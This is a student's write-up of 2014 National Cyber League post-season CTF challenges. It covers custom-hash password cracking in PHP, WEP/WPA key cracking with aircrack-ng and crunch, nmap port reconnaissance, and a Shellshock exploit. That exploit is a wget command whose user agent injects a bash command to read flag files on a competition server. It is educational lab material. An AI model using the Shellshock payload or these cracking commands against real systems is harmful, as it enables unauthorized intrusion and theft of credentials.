2014 NCL National Championship Challenge

By Glenn Murphy

Although the challenges in the NCL competition became progressively more difficult with each round, the Post-Season games at least gave the benefit of time—eight days instead of four hours. That provided the opportunity to spend many hours searching online and learning in an attempt to capture more flags. Below is a description of how one member of CLC’s Gold Bracket “CLC Team 6” approached some of the challenges in the areas of Password Cracking, Wireless Exploitation, Scanning and Reconnaissance, and Enumeration and Exploitation.





Password Cracking









Even though my efforts on the Password 1 challenge only duplicated the efforts of other members of the team, I still feel it was worth the time for the experience I gained. For this challenge an HTML file is provided which purports to be a solicitation to crack a password database in return for bitcoins. The “client” provides several plain text passwords, the password file containing usernames and hashed passwords, and nearly complete code for implementing the hashing algorithm (shown below).

Because it had been many years since I had done any kind of programming, my first order of business was to figure out what language this was written in. A Google search for strlen, ord, and base64_encode returned many pages of documentation for PHP, a language in which I had never written a single line of code, so the next step was to see if I could quickly learn enough about PHP to implement the missing characterSplit function. This turned out to be quite easy: PHP already has a str_split function that loads the individual characters of a string into an array, and it could simply replace every reference to characterSplit in the provided code. Next up was finding a way to run the code without deploying it on a web server. Thankfully Linux has a command-line PHP interpreter, so I placed the code in a simple executable script and replaced the initial jHash function call with a line of code that takes a command-line argument and loads it into the string variable used by the remaining code. The resulting code was as follows:

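#!/usr/bin/php
<?php
// Candidate password comes from the first command-line argument.
$string = $argv[1];
$hash = false;

// hash1: sum of the character codes of the password.
$hash1 = 0;
$base = base64_encode($string);
$characters = str_split($string);
foreach ($characters as $character) {
    $hash1 += ord($character);
}
$hash = $hash1 * strlen($string);

// hash2: the same sum over the base64-encoded password, times its length.
$hash2 = 0;
$characters = str_split($base);
foreach ($characters as $character) {
    $hash2 += ord($character);
}
$hash2 = $hash2 * strlen($base);

// hash3 and hash4: bitwise OR of the sums, and XOR of the two strings.
$hash3 = $hash1 | $hash2;
$hash4 = $string ^ $base;
$characters = str_split($hash4);
foreach ($characters as $character) {
    $hash4 += ord($character);
}

// Combine the parts and print the result base64 encoded (no trailing newline).
$hash = $hash1 + $hash2 + $hash3 * $hash4;
echo base64_encode($hash);
?>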



It was time for a test to see if the code was working, so I fed the script the first provided password, “Darnassus”, and checked to see if the resulting hash matched any of the hashes in the provided password file.



The lack of a newline made for rather ugly output, but the test was successful: the hash matched the first line in the password file, for user “test”. Now it was time to find potential passwords to hash, and to find a way to feed a file to the script instead of running it once per password. I played World of Warcraft once upon a time, and immediately recognized that the three provided passwords were all names of cities in the game, although someone unfamiliar with the game could have Googled Darnassus, Ratchet, and Area 52 and quickly found a wiki page listing city names for eight of the passwords. For this reason I initially concentrated on making lists of cities, towns, islands, etc. from the game. The solution I came up with was somewhat ugly, and still required some manual cleaning of the data. My procedure was to view the source of pages on the www.wowwiki.com web site that listed the kind of names likely to be used as passwords. The HTML containing the list of items (e.g. boss characters) was copied into a text file, then the HTML tags were stripped out using sed as in the following example:

cat bosses4 | sed 's|<[^>]*>||g' >> bosses

Here the fourth page of a large list of bosses was stripped of HTML tags and appended to a single text file listing one boss name per line. The file was then opened in gedit to remove any extraneous characters (many longer lists would contain letters of the alphabet dividing the list, and these would end up at the end of a name after the tags were removed). Once a list was created, it could be fed to the hashing script using another short script (which probably could have been combined into one script).

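#!/bin/bash
# custom-hash prints no newline, so each output line is the hash followed by the candidate.
while read -r line; do
    ./custom-hash "$line"
    echo "$line"
done < /root/G3/bosses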

The output of this script could then be piped to grep to see if any hashes matched those from the provided file. This technique allowed me to find the passwords my teammates had already found, but four passwords had still not been found. I did not put any more effort into building password lists at that point, since I learned that one of my more knowledgeable teammates was working on a way to scrape the entire WoWwiki site. I decided to spend the remaining hours of the competition working on other challenges.
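The strip-tags, hash, and grep steps described above can also be chained in a single program. The following is a minimal Python sketch under stated assumptions: the names `strip_tags`, `find_matches`, and `placeholder_hash` are hypothetical, and `placeholder_hash` is only an MD5 stand-in, not a port of the challenge's custom PHP hash.

```python
import hashlib
import re

TAG_RE = re.compile(r"<[^>]*>")  # same pattern as the sed expression above


def strip_tags(html_text):
    """Remove HTML tags and return the non-empty lines, trimmed."""
    text = TAG_RE.sub("", html_text)
    return [line.strip() for line in text.splitlines() if line.strip()]


def find_matches(candidates, known_hashes, hash_fn):
    """Return {hash: candidate} for every candidate whose hash is known."""
    known = set(known_hashes)
    matches = {}
    for word in candidates:
        digest = hash_fn(word)
        if digest in known:
            matches[digest] = word
    return matches


def placeholder_hash(word):
    """Stand-in only: MD5 hex digest, NOT the challenge's custom hash."""
    return hashlib.md5(word.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    # Hypothetical fragment of a wiki list page.
    page = "<ul>\n<li><a href='#'>Darnassus</a></li>\n<li>Ratchet</li>\n</ul>"
    words = strip_tags(page)
    targets = [placeholder_hash("Ratchet")]
    print(find_matches(words, targets, placeholder_hash))
```

To use it against the real password file, `hash_fn` would have to be replaced with something that produces the same output as the PHP script, for example by calling that script once per candidate.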







Wireless Exploitation









As in the previous rounds, the NCL Post-Season had four Wireless Access Exploitation challenges of increasing difficulty. Since it would not be possible to exploit a live Wi-Fi network as part of the competition, a .cap file was provided for each challenge. Each file contained authentication packets among the other data, making it possible to decrypt the traffic once the password was cracked. The first two challenges were WEP “protected” networks with a large number of initialization vectors in the .cap files, so obtaining the passwords was trivial using aircrack-ng. Wireless-1 had a 40-bit key, and Wireless-2 had a 128-bit key.















Once the key was found, it could be entered into the IEEE 802.11 preferences in Wireshark in order to decrypt the .cap file and start looking for the remaining flags.

Many of the NCL Wireless Access Exploitation challenges ask for the MAC address of a packet injector and the victim client. I did many, many internet searches in an attempt to figure out how to interpret a .cap file to find this information, but came up empty every time. There are numerous tutorials on how to perform packet injection to exploit an access point, but even when I tried to use search terms geared more towards forensics and security topics, I could not find any information on how to identify and analyze a packet injection attack from network data. I could sometimes make an educated guess by filtering for deauth packets in Wireshark, but every .cap file was different, and this did not always help.











Each Wireless Access Exploitation challenge had one flag that was fairly easy to capture once the password was cracked: the Wireless Administration interface password. The .cap files all conveniently contain HTTP traffic to the Wi-Fi access point’s web interface. For smaller .cap files it can be enough to filter for HTTP traffic and inspect the resulting packets for GET requests. For larger files with more HTTP traffic it is helpful to filter further by destination IP after determining the IP of the wireless access point. In the case of NCL-G3-WIRELESS-1.cap, the IP address was 192.168.1.1.





Following the TCP stream reveals a Base64-encoded Basic authorization header, which can easily be converted to plain text using the base64 command.

The base64 command expects its input from a file or from standard input rather than as an argument, so as can be seen above, giving it encoded data from the command line is a bit awkward. Another option is to put the Base64-encoded data in a text file, after which the command syntax is simply

base64 -d <filename>
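The same decoding step can be done without a temporary file. This is a minimal Python sketch, assuming the value copied from the TCP stream has the usual `Basic <token>` form; the function name `decode_basic_auth` and the sample credentials are hypothetical and are not the ones from the capture.

```python
import base64


def decode_basic_auth(header_value):
    """Decode an HTTP 'Basic <token>' authorization value into (user, password)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        raise ValueError("not a Basic authorization value")
    decoded = base64.b64decode(token.strip()).decode("utf-8", errors="replace")
    # Split on the first colon only; the password may itself contain ':'.
    user, _, password = decoded.partition(":")
    return user, password


if __name__ == "__main__":
    # Hypothetical credentials for illustration only.
    sample = "Basic " + base64.b64encode(b"admin:example-password").decode("ascii")
    print(decode_basic_auth(sample))
```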





The Wireless-3 and Wireless-4 challenges for all rounds of the NCL competition used WPA encryption, with the difficulty steadily increasing with each round. Wireless-3 in each case was susceptible to dictionary attacks, but needed a larger dictionary each round. The darkc0de.lst file distributed with many cracking programs was fine to start with, but it was necessary to move up to rockyou.txt for Round 2. The massive crackstation.txt dictionary contained the password for the Post-Season Wireless-3 challenge, although I started it too late in the week to find the key before the competition ended (the key was found approximately 3 hours after the deadline).



As you can see from the screen capture, it took my virtual machine just under 57 hours to check nearly 780 million passwords. This virtual machine was a 64-bit Kali installation using 6 cores of an AMD FX-8120 processor, so it was not exactly the best setup for password cracking. AMD’s FX processors have a modular design where each module has two cores with independent integer units, but the two cores share a floating point unit (see http://en.wikipedia.org/wiki/Bulldozer_%28microarchitecture%29#Bulldozer_core). AMD’s intention was that machines using FX processors would also use AMD GPUs, which could be used to pick up some of the heavy floating point workloads. Unfortunately, the VM I used was running on an ESXi host that is not configured for direct access to hardware such as the graphics card, and the graphics card is an old, under-powered model used only for console access during installation of the OS.

Before deciding I had nothing to lose by letting the VM run aircrack-ng for days, I had made an attempt to set up a physical machine to use a GPU. An external USB3 dock was used with an old hard drive to run Linux on what is usually a Windows 8 computer. The machine in question has an AMD FX-6300 six-core processor and an AMD Radeon HD 7700 GPU. This is not a high-end GPU, but benchmarks I saw on various websites indicated that it should be able to do roughly 90,000 WPA keys/second. Unfortunately, it can be quite tricky to get this set up properly in Linux. In order to enable the use of GPU processing by tools like aircrack-ng or oclHashcat it is necessary to use proprietary drivers. These drivers can conflict with the open-source drivers if not properly installed, and are very finicky about kernel and library versions. The best performance I managed to obtain was about 12,000 keys/second. Although this was a three-fold improvement over the VM’s performance, it was only a fraction of the performance the GPU should have been capable of. Since it was obvious that something was not right in my configuration, I chose not to run this setup for fear of damaging the GPU.
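The rates quoted above can be cross-checked with a little arithmetic. This is a back-of-the-envelope Python sketch that treats "nearly 780 million" and "just under 57 hours" as exact figures; the function names are hypothetical.

```python
def keys_per_second(keys_tested, hours):
    """Average cracking rate for a run that tested keys_tested keys."""
    return keys_tested / (hours * 3600)


def hours_to_test(keys, rate):
    """Hours needed to test `keys` candidates at `rate` keys per second."""
    return keys / rate / 3600


if __name__ == "__main__":
    tested = 780_000_000  # "nearly 780 million", rounded
    vm_rate = keys_per_second(tested, 57)  # "just under 57 hours", rounded
    print(f"VM: about {vm_rate:,.0f} keys/second")
    for label, rate in (("GPU as configured", 12_000),
                        ("GPU benchmark figure", 90_000)):
        print(f"{label}: about {hours_to_test(tested, rate):.1f} hours")
```

With these rounded inputs the VM works out to roughly 3,800 keys/second, which is consistent with 12,000 keys/second being about a three-fold improvement. The same 780 million candidates would take about 18 hours at 12,000 keys/second and about 2.4 hours at 90,000 keys/second.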



Another approach I attempted (unsuccessfully) to use for cracking the WPA passwords was to use the crunch command to generate wordlists for aircrack-ng on the fly. It can take a while to learn crunch’s syntax, but it can be a very powerful tool if you want to try potential passwords with a particular pattern, and piping it directly to a cracking program eliminates the need to store the huge files crunch is capable of generating (for example, all combinations of 8 lowercase letters would produce a nearly 2TB text file). Earlier rounds of the NCL competition had passwords such as “pumpkinpie” and “pumpkinhead”, so I wanted to explore possible passwords starting with the word pumpkin. The following command uses crunch to generate 12-character passwords starting with pumpkin followed by five lower-case letters, and pipes them into aircrack-ng from stdin.

crunch 12 12 -t pumpkin@@@@@ | aircrack-ng --bssid c0:c1:c0:89:10:fe -w- NCL-G3-WIRELESS-3.cap
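The sizes involved in the crunch patterns above are easy to estimate. This minimal Python sketch assumes one candidate per line with a single newline byte, and a 26-letter lowercase alphabet for each free position; the function names are hypothetical.

```python
LOWERCASE = 26  # crunch's "@" placeholder stands for one lowercase letter


def candidate_count(free_positions, alphabet=LOWERCASE):
    """Number of candidates when each free position takes any alphabet symbol."""
    return alphabet ** free_positions


def wordlist_size_bytes(length, alphabet=LOWERCASE):
    """Size of a file holding every word of `length` letters, one per line."""
    return candidate_count(length, alphabet) * (length + 1)


if __name__ == "__main__":
    print(candidate_count(5))             # pumpkin@@@@@ -> 11881376 candidates
    print(wordlist_size_bytes(8) / 1e12)  # all 8-letter words, in terabytes
```

The 8-letter case comes to 1,879,443,581,184 bytes, which matches the "nearly 2TB" figure. The pumpkin pattern has just under 12 million candidates, which is small enough to test in a single sitting even at a few thousand keys per second.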

The pumpkin run took about an hour on my VM (checking 3 and 4 character combinations was very fast), but as can be seen above, I was looking for the wrong pattern. I had simply assumed that the pattern from previous rounds would continue, and it did not occur to me that having moved on from October to November the theme might change. I did not test this theory, but in cases like this it might be possible to build a smaller dictionary from crackstation.txt using grep to find passwords containing pumpkin, turkey, etc. Although the full crackstation file is 15GB, grep should be able to run through it and create a smaller targeted dictionary much faster than aircrack-ng can work through the entire dictionary sequentially.
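The untested idea above, pulling themed candidates out of a large dictionary, could look something like the following. It is a minimal Python sketch rather than a tested workflow: the function name, file names, and keyword list are hypothetical, and the 8 to 63 character limits reflect the length range allowed for WPA passphrases.

```python
import os
import re
import tempfile


def build_themed_wordlist(src_path, dst_path, keywords, min_len=8, max_len=63):
    """Copy lines containing any keyword (case-insensitive); return the count kept."""
    pattern = re.compile("|".join(re.escape(k) for k in keywords), re.IGNORECASE)
    kept = 0
    # latin-1 maps every byte to a character, so odd bytes never raise errors.
    with open(src_path, "r", encoding="latin-1") as src, \
            open(dst_path, "w", encoding="latin-1") as dst:
        for line in src:
            word = line.rstrip("\r\n")
            if min_len <= len(word) <= max_len and pattern.search(word):
                dst.write(word + "\n")
                kept += 1
    return kept


if __name__ == "__main__":
    # Tiny stand-in for the real dictionary so the sketch runs anywhere.
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "big-dictionary.txt")
        dst = os.path.join(tmp, "themed.txt")
        with open(src, "w", encoding="latin-1") as handle:
            handle.write("pumpkinpie\nturkeydinner\npassword1\npie\n")
        print(build_themed_wordlist(src, dst, ["pumpkin", "turkey"]))
```

The file is streamed line by line, so memory use stays flat even for a 15GB input.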

Although my lack of success during the competition was a bit frustrating, I did learn a lot from my attempts to crack the password for NCL-G3-WIRELESS-3.cap. I try to console myself with the knowledge that even if I had cracked it a few hours sooner, the flags for this challenge were not worth enough points to move our team up any further in the standings.









Scanning and Reconnaissance





The NCL Scanning and Reconnaissance challenges generally have some low-hanging fruit simply asking for the first 1 through n TCP or UDP ports on the server at the given target IP. Most of the ports can be found using a simple default scan such as the TCP scan for Recon 1 shown below.

Finding the higher point value open ports requires only a little more knowledge of nmap, such as realizing that by default it scans only the 1,000 most common ports. Therefore, to find the remaining open port flags, it is usually only necessary to either specify a port range to scan or (if you are a little more patient) scan all ports.



The Recon 2 flags for the post-season were somewhat more challenging. The first order of business is to find the port that has an HTTP/1.1-compliant web server running on it. As can be seen in the scan for ports 50-70 shown below, this target returns what appear to be random banners for every port. Depending on the type of scan, nmap will tell you that either all ports are open, all ports are closed, or all ports are filtered.

For a long time I assumed that this behavior was an Intrusion Detection System responding to my scans, so I spent a lot of time playing with timing options and custom TCP flags in an attempt to get around it. All I learned from this was that the standard ports for SSH, SMTP, and Samba did appear to actually be open: all scans and attempts to connect to these ports using telnet gave the same response every time. It finally occurred to me that I was approaching the problem all wrong. The key lesson was that open ports gave the same response every time, while the remaining ports were likely to respond with a different banner each time they were scanned. So the solution was to scan all ports more than once, and then compare the scans for ports that did not change. I did two scans of all ports, and had nmap output the results in all formats, because although I wasn’t sure how I was going to search through two sets of 65,535 ports, I knew I wasn’t going to do it with my eyeballs. The command I used to generate the first scan is shown below.

nmap -Pn -v -n -p- -sV 54.204.15.112 -oA recon2-all-ports-diff1

There are probably easy ways to use nmap’s XML output to analyze data, but I’m not familiar with them. What I do know is that if you want to manipulate text data using common command line tools, there is probably a solution to be found on http://stackoverflow.com. I knew there was a Unix tool called diff that will show you which lines of two files are different, but I was surprised to discover that there is no easy tool to use to show which lines match. It didn’t take long to find the following code from http://stackoverflow.com/questions/12246910/shell-find-matching-lines-across-many-files/19861397#19861397.

#!/bin/bash
ans="matching_lines"
for file1 in *
do
    for file2 in *
    do
        if [ "$file1" != "$ans" ] && [ "$file2" != "$ans" ] && [ "$file1" != "$file2" ] ; then
            echo "Comparing: $file1 $file2 ..." >> "$ans"
            perl -ne 'print if ($seen{$_} .= @ARGV) =~ /10$/' "$file1" "$file2" >> "$ans"
        fi
    done
done
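The Perl one-liner in the script above is compact. It appears to tag each line with the number of files still waiting to be read, so a tag ending in "10" marks a line that was seen in the first file and is now being seen in the second. A minimal Python sketch of the same idea, with a hypothetical function name, may be easier to follow:

```python
def common_lines(first, second):
    """Lines of `second` that also occur in `first`, each once, in `second` order."""
    in_first = set(first)
    already_printed = set()
    result = []
    for line in second:
        if line in in_first and line not in already_printed:
            already_printed.add(line)
            result.append(line)
    return result


if __name__ == "__main__":
    # Hypothetical scan lines for illustration.
    scan1 = ["22/tcp open ssh", "50/tcp open ftp", "25/tcp open smtp"]
    scan2 = ["22/tcp open ssh", "50/tcp open pop3", "25/tcp open smtp"]
    print(common_lines(scan1, scan2))
```

Like the shell version, this compares whole lines exactly, so any difference in spacing between two otherwise identical lines counts as a mismatch.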

A quick test comparing .nmap files from two scans of the target showed that I had a problem. The format of the .nmap file is four columns separated by whitespace showing PORT, STATE, SERVICE, and VERSION. But the amount of whitespace can change from one scan to the next depending on the length of the data contained in the SERVICE column, causing some matches to be missed. This was easily remedied by using tr to reduce all whitespace to single spaces:

cat file.nmap | tr -s ' ' > newfile.nmap
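An alternative to normalizing whitespace and then comparing whole lines is to parse each port line into fields and compare per port. This is a minimal Python sketch, assuming nmap's normal output with PORT, STATE, SERVICE, and VERSION columns as described above; the function names and sample banners are hypothetical.

```python
import re

# port/protocol, state, service, then an optional free-text version column
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_scan(text):
    """Map 'port/proto' -> (state, service, version) for each port line."""
    ports = {}
    for line in text.splitlines():
        match = PORT_LINE.match(line.strip())
        if match:
            port, proto, state, service, version = match.groups()
            # Collapse runs of whitespace so column padding does not matter.
            ports[f"{port}/{proto}"] = (state, service, " ".join(version.split()))
    return ports


def stable_ports(scan_a, scan_b):
    """Ports reported with identical state, service, and version in both scans."""
    a, b = parse_scan(scan_a), parse_scan(scan_b)
    return {port: a[port] for port in a if port in b and a[port] == b[port]}


if __name__ == "__main__":
    first = "PORT STATE SERVICE VERSION\n22/tcp   open  ssh   OpenSSH\n50/tcp open ftp vsftpd\n"
    second = "PORT STATE SERVICE VERSION\n22/tcp open ssh OpenSSH\n50/tcp open smtp Postfix\n"
    print(stable_ports(first, second))
```

Filtering the returned dictionary for entries whose service contains "http" gives the same kind of short list as grepping the matching lines.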



After the resulting files were run through the Bash comparison script above, I was able to grep the resulting matching_lines file for “http”. This resulted in a very short list of ports to check:







Port 56565 was indeed running nginx, and a quick look at the page source gave 5 easy flags:

<html> <head> <title>Flag 2: NCL-MORE-1337</title> </head> <body bgcolor="white" text="black"> <center><h1>Flag 1: NCL-KDLS-8682</h1></center> <span style="color: white">Flag 3: NCL-6320-HCDL</span> <span style="font-size: 1px">Flag 4: NCL-1639-UCLS</span> <!-- Flag 5: TkNMLUNXTkItNzI0NAo= --!> </body> </html>

Flags 1 and 2 were in plain sight in the page and the browser title bar, flag 3 was hidden by making it white text on a white background, flag 4 was in an unreadable 1-pixel font, and flag 5 was base64 encoded in a comment. Although I did poke around a little more on this server, I never discovered where the sixth flag was hidden, and chose to spend the remaining time on other challenges.
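Working from the raw page source rather than the rendered page makes all five flags equally visible. The following is a minimal Python sketch, assuming every flag appears as `Flag N: value` in the source; the function names are hypothetical.

```python
import base64
import binascii
import re

FLAG_RE = re.compile(r"Flag\s+(\d+):\s*([A-Za-z0-9+/=-]+)")


def maybe_decode(value):
    """Decode the value as Base64 unless it already looks like an NCL flag."""
    if value.startswith("NCL-"):
        return value
    try:
        return base64.b64decode(value, validate=True).decode("ascii").strip()
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return value  # not valid Base64 text, so keep it unchanged


def extract_flags(page_source):
    """Return {flag number: flag text} for every 'Flag N: value' in the source."""
    return {int(number): maybe_decode(value)
            for number, value in FLAG_RE.findall(page_source)}


if __name__ == "__main__":
    source = ('<title>Flag 2: NCL-MORE-1337</title>'
              '<span style="color: white">Flag 3: NCL-6320-HCDL</span>'
              '<!-- Flag 5: TkNMLUNXTkItNzI0NAo= --!>')
    for number, flag in sorted(extract_flags(source).items()):
        print(number, flag)  # flag 5 decodes to NCL-CWNB-7244
```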

















Enumeration and Exploitation















With time running out on Saturday night, CLC Team 6 was slowly falling in the standings, and I was becoming desperate to find something I could figure out for some more points. The last thing I looked at was Exploit 3, a web server with a simple page that uses links to display the output of some common commands using a CGI interface.



I spent a fair amount of time trying to figure out if there was some way to get the output from command injection using the browser, and based on what I was seeing in the ps aux output, I wasn’t the only one. This approach was a dead end, but did at least show me that the ps output was real, as evidenced by my frustrated question displayed as PID 22111 in the output below.

Although I did not find a way to find the flags on this target using a browser, I did get a lot of useful information from the process list. First of all, I noticed that in most cases, the next PID after a CGI process was /bin/bash -i, a call to an interactive shell. It was time to start reading up on how to exploit Shellshock. The other piece of information gained was the path to the cgi-bin directory, which could be useful once an exploit was found.



My Metasploit installation was up to date, and included multiple exploits for the bash Shellshock bug. However, after about half an hour of playing around with their options, I was unable to successfully connect to the target with a reverse shell payload. I was starting to wonder if I was on the right track, so I took a step back and started searching the web for various ways to remotely test if a server was susceptible to Shellshock. Eventually my searches led me to a page (http://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited) explaining how to use wget’s user agent string to send commands to a web server, with the command output dumped to the file that wget is supposedly trying to download. This method could be used to list directories, then cat the contents of flag files once they were found, as in the following example for flag 2:

wget --secure-protocol=auto --no-check-certificate -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /var/www/flag02.php" https://54.83.28.186/cgi-bin/psaux.cgi

which resulted in the following output:

Unfortunately, I didn’t figure out this exploit until there were literally only minutes left in the competition, so I ran out of time before I could find all of the flags. Amusingly, I never found flag 1, although that was probably meant to be the easiest one. Once I figured out the exploit, I went straight to a listing of the root directory to get my bearings, and found flags 3 and 4 in text files there. I went back to the /var/www directory next and found flag 2 in a PHP file, but then the clock hit 11PM and the contest was over. Fortunately, the flags I did get from this target gave enough points to raise the team from 11th to 8th in the standings almost literally at the last minute (my last flag capture was at 10:57PM).
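The structure of the user agent string in the wget command above is easier to see when it is assembled piece by piece. This minimal Python sketch only builds and recognizes the string and sends nothing over the network; both function names are hypothetical.

```python
def shellshock_user_agent(command):
    """Build a User-Agent value shaped like the one in the wget command above."""
    # A function-definition prefix; vulnerable bash versions keep executing
    # whatever follows it when the value is imported as an environment variable.
    prefix = "() { test;};"
    # A minimal CGI header plus blank lines, so the command output is
    # returned to the client as the response body.
    header = 'echo "Content-type: text/plain"; echo; echo;'
    return f"{prefix}{header} {command}"


def looks_like_shellshock(header_value):
    """Rough check for the function-definition prefix, e.g. when reviewing logs."""
    return header_value.lstrip().startswith("() {")


if __name__ == "__main__":
    value = shellshock_user_agent("/bin/cat /var/www/flag02.php")
    print(value)
    print(looks_like_shellshock(value))
```

The second function is the kind of simple test that could be applied to captured request headers when looking for evidence of this attack after the fact.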

Conclusion

Although I was often frustrated by my lack of knowledge, especially in web app exploitation, competing in the NCL was a very fun and educational experience overall. I often surprised myself with how much I could learn on the fly just using Google and some common sense. My biggest regret was the lack of planning for the Post-Season team round. There was very little communication between team members (I was almost always the only student on the IRC channel), and a lot of duplicated effort. We were a bunch of individuals with a combined score rather than a team. One member of the Gold team did not capture any flags, and I felt this should not have happened if we were actually working as a team. I still hope everyone got something out of it, and that what we learned can be used to improve the experience for future classes.